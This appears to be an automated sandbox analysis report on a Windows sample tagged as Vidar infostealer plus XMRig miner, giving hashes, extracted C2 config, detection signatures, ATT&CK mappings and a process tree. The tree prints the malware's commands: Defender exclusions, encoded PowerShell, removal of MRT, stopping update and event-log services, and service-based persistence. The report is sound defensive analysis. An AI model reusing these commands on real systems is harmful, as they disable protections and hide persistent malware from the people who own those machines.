vidar | 5e34f09b2e0d1a442d029a9ca9aa0074d82bf577bb3f4c7a8cedb95314cd9be6

Analysis

max time kernel
96s
max time network
98s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
24-03-2024 01:22

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

017b15febc04189f8450a52455fe65f942ef1d31d2f8a1e1492b964eff14c455.exe
Size

5.5MB
MD5

2b74fd898c6ca79faa64f3d9cae268d4
SHA1

206353bb5b604968e4821e115748f9aa3df6a671
SHA256

017b15febc04189f8450a52455fe65f942ef1d31d2f8a1e1492b964eff14c455
SHA512

d7e7744acf93868df00ac8be04dd4f35dbd9ec984f69899fa815692b41911f3a7dc8d81d2f12ee72a6b945f83db21fc50665769da5d3fb205ef25b8ddd151ac7
SSDEEP

98304:QoxgTUyKDV4dn82Ytf6IkQHWmXneKPpfmncntCkHx+Ji3MLepmWr34Dfr:NyKx4dn82Ytyz1yNpfmn+tCux+8m9M4D

Score

10^/10

vidar xmrig d165eae423b0d6c5abd85327c20d845d evasion miner persistence stealer upx

Malware Config

Extracted

Family

vidar

Version

8.4

Botnet

d165eae423b0d6c5abd85327c20d845d

https://steamcommunity.com/profiles/76561199654112719

https://t.me/r2d0s

Attributes

profile_id_v2
d165eae423b0d6c5abd85327c20d845d
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0

Signatures

Detect Vidar Stealer 1 IoCs

stealer

resource	yara_rule
behavioral1/files/0x00090000000141a2-12.dat	family_vidar_v7

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 3 IoCs

miner

resource	yara_rule
behavioral1/memory/1468-281-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/1468-294-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/1468-280-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File created	C:\Windows\system32\drivers\etc\hosts	whrbuflqwhah.exe
File created	C:\Windows\system32\drivers\etc\hosts	Miner.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Executes dropped EXE 7 IoCs

pid	Process
1944	Payload.exe
3020	build.exe
2568	Miner.exe
2604	Shortcutter.exe
480	services.exe
2556	whrbuflqwhah.exe
1604	whrbuflqwhah.exe

Loads dropped DLL 5 IoCs

pid	Process
2172	017b15febc04189f8450a52455fe65f942ef1d31d2f8a1e1492b964eff14c455.exe
1944	Payload.exe
1944	Payload.exe
1944	Payload.exe
480	services.exe

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1468-275-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1468-278-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1468-281-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1468-294-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1468-280-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1468-276-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1468-274-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1468-273-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Drops file in System32 directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\MRT.exe	whrbuflqwhah.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	Miner.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 2568 set thread context of 2144	2568	Miner.exe	54
PID 2556 set thread context of 1428	2556	whrbuflqwhah.exe	82
PID 2556 set thread context of 2280	2556	whrbuflqwhah.exe	83
PID 2556 set thread context of 1468	2556	whrbuflqwhah.exe	84

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\build.exe	017b15febc04189f8450a52455fe65f942ef1d31d2f8a1e1492b964eff14c455.exe
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe

Launches sc.exe 20 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2536	sc.exe
2216	sc.exe
1740	sc.exe
324	sc.exe
1728	sc.exe
1576	sc.exe
2180	sc.exe
2576	sc.exe
2000	sc.exe
2540	sc.exe
2528	sc.exe
912	sc.exe
2188	sc.exe
1620	sc.exe
2888	sc.exe
1640	sc.exe
2208	sc.exe
2596	sc.exe
1680	sc.exe
2508	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1820	3020	WerFault.exe	31

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 709857cb897dda01	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	build.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	build.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	build.exe

Suspicious behavior: EnumeratesProcesses 39 IoCs

pid	Process
2388	powershell.exe
2552	powershell.exe
2568	Miner.exe
2396	powershell.exe
2568	Miner.exe
2568	Miner.exe
2568	Miner.exe
2568	Miner.exe
2568	Miner.exe
2568	Miner.exe
2568	Miner.exe
2568	Miner.exe
2568	Miner.exe
2144	dialer.exe
2144	dialer.exe
2144	dialer.exe
2144	dialer.exe
2568	Miner.exe
2568	Miner.exe
2568	Miner.exe
2556	whrbuflqwhah.exe
1916	powershell.exe
2556	whrbuflqwhah.exe
2556	whrbuflqwhah.exe
2556	whrbuflqwhah.exe
2556	whrbuflqwhah.exe
2556	whrbuflqwhah.exe
2556	whrbuflqwhah.exe
2556	whrbuflqwhah.exe
2556	whrbuflqwhah.exe
1428	dialer.exe
1428	dialer.exe
1428	dialer.exe
1428	dialer.exe
2556	whrbuflqwhah.exe
2280	dialer.exe
3060	powershell.exe
2280	dialer.exe
1604	whrbuflqwhah.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	2388	powershell.exe
Token: SeDebugPrivilege	2552	powershell.exe
Token: SeDebugPrivilege	2604	Shortcutter.exe
Token: SeDebugPrivilege	2396	powershell.exe
Token: SeDebugPrivilege	2144	dialer.exe
Token: SeDebugPrivilege	1916	powershell.exe
Token: SeDebugPrivilege	1428	dialer.exe
Token: SeDebugPrivilege	3060	powershell.exe

Suspicious use of UnmapMainImage 2 IoCs

pid	Process
480	services.exe
480	services.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2172 wrote to memory of 2388	2172	017b15febc04189f8450a52455fe65f942ef1d31d2f8a1e1492b964eff14c455.exe	28
PID 2172 wrote to memory of 2388	2172	017b15febc04189f8450a52455fe65f942ef1d31d2f8a1e1492b964eff14c455.exe	28
PID 2172 wrote to memory of 2388	2172	017b15febc04189f8450a52455fe65f942ef1d31d2f8a1e1492b964eff14c455.exe	28
PID 2172 wrote to memory of 2388	2172	017b15febc04189f8450a52455fe65f942ef1d31d2f8a1e1492b964eff14c455.exe	28
PID 2172 wrote to memory of 1944	2172	017b15febc04189f8450a52455fe65f942ef1d31d2f8a1e1492b964eff14c455.exe	30
PID 2172 wrote to memory of 1944	2172	017b15febc04189f8450a52455fe65f942ef1d31d2f8a1e1492b964eff14c455.exe	30
PID 2172 wrote to memory of 1944	2172	017b15febc04189f8450a52455fe65f942ef1d31d2f8a1e1492b964eff14c455.exe	30
PID 2172 wrote to memory of 1944	2172	017b15febc04189f8450a52455fe65f942ef1d31d2f8a1e1492b964eff14c455.exe	30
PID 2172 wrote to memory of 3020	2172	017b15febc04189f8450a52455fe65f942ef1d31d2f8a1e1492b964eff14c455.exe	31
PID 2172 wrote to memory of 3020	2172	017b15febc04189f8450a52455fe65f942ef1d31d2f8a1e1492b964eff14c455.exe	31
PID 2172 wrote to memory of 3020	2172	017b15febc04189f8450a52455fe65f942ef1d31d2f8a1e1492b964eff14c455.exe	31
PID 2172 wrote to memory of 3020	2172	017b15febc04189f8450a52455fe65f942ef1d31d2f8a1e1492b964eff14c455.exe	31
PID 1944 wrote to memory of 2552	1944	Payload.exe	32
PID 1944 wrote to memory of 2552	1944	Payload.exe	32
PID 1944 wrote to memory of 2552	1944	Payload.exe	32
PID 1944 wrote to memory of 2552	1944	Payload.exe	32
PID 1944 wrote to memory of 2568	1944	Payload.exe	34
PID 1944 wrote to memory of 2568	1944	Payload.exe	34
PID 1944 wrote to memory of 2568	1944	Payload.exe	34
PID 1944 wrote to memory of 2568	1944	Payload.exe	34
PID 1944 wrote to memory of 2604	1944	Payload.exe	35
PID 1944 wrote to memory of 2604	1944	Payload.exe	35
PID 1944 wrote to memory of 2604	1944	Payload.exe	35
PID 1944 wrote to memory of 2604	1944	Payload.exe	35
PID 3020 wrote to memory of 1820	3020	build.exe	38
PID 3020 wrote to memory of 1820	3020	build.exe	38
PID 3020 wrote to memory of 1820	3020	build.exe	38
PID 3020 wrote to memory of 1820	3020	build.exe	38
PID 1724 wrote to memory of 2884	1724	cmd.exe	47
PID 1724 wrote to memory of 2884	1724	cmd.exe	47
PID 1724 wrote to memory of 2884	1724	cmd.exe	47
PID 2568 wrote to memory of 2144	2568	Miner.exe	54
PID 2568 wrote to memory of 2144	2568	Miner.exe	54
PID 2568 wrote to memory of 2144	2568	Miner.exe	54
PID 2568 wrote to memory of 2144	2568	Miner.exe	54
PID 2568 wrote to memory of 2144	2568	Miner.exe	54
PID 2568 wrote to memory of 2144	2568	Miner.exe	54
PID 2568 wrote to memory of 2144	2568	Miner.exe	54
PID 2144 wrote to memory of 436	2144	dialer.exe	5
PID 2144 wrote to memory of 480	2144	dialer.exe	6
PID 2352 wrote to memory of 2624	2352	cmd.exe	65
PID 2352 wrote to memory of 2624	2352	cmd.exe	65
PID 2352 wrote to memory of 2624	2352	cmd.exe	65
PID 480 wrote to memory of 2556	480	services.exe	66
PID 480 wrote to memory of 2556	480	services.exe	66
PID 480 wrote to memory of 2556	480	services.exe	66
PID 1268 wrote to memory of 2484	1268	cmd.exe	95
PID 1268 wrote to memory of 2484	1268	cmd.exe	95
PID 1268 wrote to memory of 2484	1268	cmd.exe	95
PID 2556 wrote to memory of 1428	2556	whrbuflqwhah.exe	82
PID 2556 wrote to memory of 1428	2556	whrbuflqwhah.exe	82
PID 2556 wrote to memory of 1428	2556	whrbuflqwhah.exe	82
PID 2556 wrote to memory of 1428	2556	whrbuflqwhah.exe	82
PID 2556 wrote to memory of 1428	2556	whrbuflqwhah.exe	82
PID 2556 wrote to memory of 1428	2556	whrbuflqwhah.exe	82
PID 2556 wrote to memory of 1428	2556	whrbuflqwhah.exe	82
PID 2556 wrote to memory of 2280	2556	whrbuflqwhah.exe	83
PID 2556 wrote to memory of 2280	2556	whrbuflqwhah.exe	83
PID 2556 wrote to memory of 2280	2556	whrbuflqwhah.exe	83
PID 2556 wrote to memory of 2280	2556	whrbuflqwhah.exe	83
PID 2556 wrote to memory of 2280	2556	whrbuflqwhah.exe	83
PID 2556 wrote to memory of 2280	2556	whrbuflqwhah.exe	83
PID 2556 wrote to memory of 2280	2556	whrbuflqwhah.exe	83
PID 2556 wrote to memory of 2280	2556	whrbuflqwhah.exe	83

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:436
- C:\Windows\system32\wlrmdr.exe
  -s -1 -f 2 -t You are about to be logged off -m Windows has encountered a critical problem and will restart automatically in one minute. Please save your work now. -a 3
  2⤵
  PID:876

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:480
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k DcomLaunch
  2⤵
  PID:608
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k RPCSS
  2⤵
  PID:688
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
  2⤵
  PID:764
- C:\ProgramData\trmrjvadsnmf\whrbuflqwhah.exe
  C:\ProgramData\trmrjvadsnmf\whrbuflqwhah.exe
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2556
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1268
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      Drops file in Windows directory
      PID:2484
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:2536
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:1680
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1620
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    - Launches sc.exe
    PID:2888
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:2216
- - C:\Windows\system32\dialer.exe
    C:\Windows\system32\dialer.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1428
- - C:\Windows\system32\dialer.exe
    C:\Windows\system32\dialer.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2280
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3060
  - - C:\ProgramData\trmrjvadsnmf\whrbuflqwhah.exe
      "C:\ProgramData\trmrjvadsnmf\whrbuflqwhah.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:1604
    - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        5⤵
        Drops file in System32 directory
        
        PID:1596
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:1288
      - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        6⤵
        
        PID:2484
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        5⤵
        Launches sc.exe
        
        PID:2508
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        
        PID:1740
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:324
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        5⤵
        Launches sc.exe
        
        PID:2000
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        5⤵
        Launches sc.exe
        
        PID:1640
    - - C:\Windows\system32\dialer.exe
        
        C:\Windows\system32\dialer.exe
        5⤵
        
        PID:2352
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      PID:488
  - - C:\Windows\System32\sc.exe
      C:\Windows\System32\sc.exe delete "RYVSUJUA"
      4⤵
      Launches sc.exe
      PID:2528
- - C:\Windows\system32\dialer.exe
    dialer.exe
    3⤵
    PID:1468

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:496

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:504

C:\Users\Admin\AppData\Local\Temp\017b15febc04189f8450a52455fe65f942ef1d31d2f8a1e1492b964eff14c455.exe
"C:\Users\Admin\AppData\Local\Temp\017b15febc04189f8450a52455fe65f942ef1d31d2f8a1e1492b964eff14c455.exe"
1⤵
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2172
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AYgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAcwB2ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGwAagB5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AcQBsACMAPgA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2388
- C:\Users\Admin\AppData\Roaming\Payload.exe
  "C:\Users\Admin\AppData\Roaming\Payload.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1944
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAZQBzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAcQBoACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAZwBmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAaABlACMAPgA="
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2552
- - C:\Users\Admin\AppData\Roaming\Miner.exe
    "C:\Users\Admin\AppData\Roaming\Miner.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:2568
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2396
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1724
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        Drops file in Windows directory
        
        PID:2884
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:912
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:1728
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:1576
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:2208
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:2180
  - - C:\Windows\system32\dialer.exe
      C:\Windows\system32\dialer.exe
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2144
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "RYVSUJUA"
      4⤵
      Launches sc.exe
      PID:2596
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "RYVSUJUA" binpath= "C:\ProgramData\trmrjvadsnmf\whrbuflqwhah.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:2540
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:2188
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "RYVSUJUA"
      4⤵
      Launches sc.exe
      PID:2576
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Miner.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2352
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:2624
- - C:\Users\Admin\AppData\Roaming\Shortcutter.exe
    "C:\Users\Admin\AppData\Roaming\Shortcutter.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2604
- C:\Windows\build.exe
  "C:\Windows\build.exe"
  2⤵
  - Executes dropped EXE
  - Modifies system certificate store
  - Suspicious use of WriteProcessMemory
  PID:3020
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3020 -s 1480
    3⤵
    - Program crash
    PID:1820

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

